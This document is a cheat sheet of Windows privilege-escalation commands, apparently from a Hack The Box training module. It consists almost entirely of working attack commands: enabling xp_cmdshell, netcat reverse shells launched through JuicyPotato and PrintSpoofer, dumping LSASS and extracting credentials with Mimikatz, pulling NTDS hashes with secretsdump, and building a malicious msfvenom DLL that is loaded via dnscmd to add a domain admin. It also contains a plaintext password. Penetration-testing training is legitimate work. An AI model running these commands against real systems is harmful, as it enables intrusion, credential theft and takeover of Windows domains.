Handy Commands

Handy Commands

1. Connect using mssqlclient.py

Command:

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

Description: Connect using mssqlclient.py

2. Enable xp_cmdshell

Command:

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

Description: Enable xp_cmdshell

3. Run OS commands with xp_cmdshell

Command:

xp_cmdshell 'whoami'

Description: Run OS commands with xp_cmdshell

4. Escalate privileges with JuicyPotato

Command:

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t *

Description: Escalate privileges with JuicyPotato

5. Escalating privileges with PrintSpoofer

Command:

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

Description: Escalate privileges with PrintSpoofer

6. Take memory dump with ProcDump

Command:

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Description: Take memory dump with ProcDump

7. Extract credentials from LSASS dump using Mimikatz

Command:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

Description: Use MimiKatz to extract credentials from LSASS memory dump

8. Checking ownership of a file

Command:

dir /q C:\backups\wwwroot\web.config

Description: Check ownership of a file

9. Taking ownership of a file

Command:

takeown /f C:\backups\wwwroot\web.config

Description: Take ownership of a file

10. Confirm changed ownership of a file

Command:

Get-ChildItem -Path 'C:\backups\wwwroot\web.config' | select name,directory, @{Name="Owner";Expression={(Get-ACL $_.Fullname).Owner}}

Description: Confirm changed ownership of a file

11. Modifying a file ACL

Command:

icacls "C:\backups\wwwroot\web.config" /grant htb-student:F

Description: Modify a file ACL

12. Extract hashes with secretsdump.py

Command:

secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

Description: Extract hashes with secretsdump.py

13. Copy files with ROBOCOPY

Command:

robocopy /B E:\Windows\NTDS .\ntds ntds.dit

Description: Copy files with ROBOCOPY

14. Searching security event logs

Command:

wevtutil qe Security /rd:true /f:text | Select-String "/user"

Description: Search security event logs

15. Passing credentials to wevtutil

Command:

wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

Description: Pass credentials to wevtutil

16. Searching event logs with PowerShell

Command:

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*' } | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

Description: Search event logs with PowerShell

17. Generate malicious DLL

Command:

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Description: Generate malicious DLL

18. Loading a custom DLL with dnscmd

Command:

dnscmd.exe /config /serverlevelplugindll adduser.dll

Description: Load a custom DLL with dnscmd

19. Finding a user's SID

Command:

wmic useraccount where name="netadm" get sid

Description: Find a user's SID

20. Checking permissions on DNS service

Command:

sc.exe sdshow DNS

Description: Check permissions on DNS service

21. Stopping a service

Command:

sc stop dns

Description: Stop a service

22. Starting a service

Command:

sc start dns

Description: Start a service

23. Querying a registry key

Command:

reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Description: Query a registry key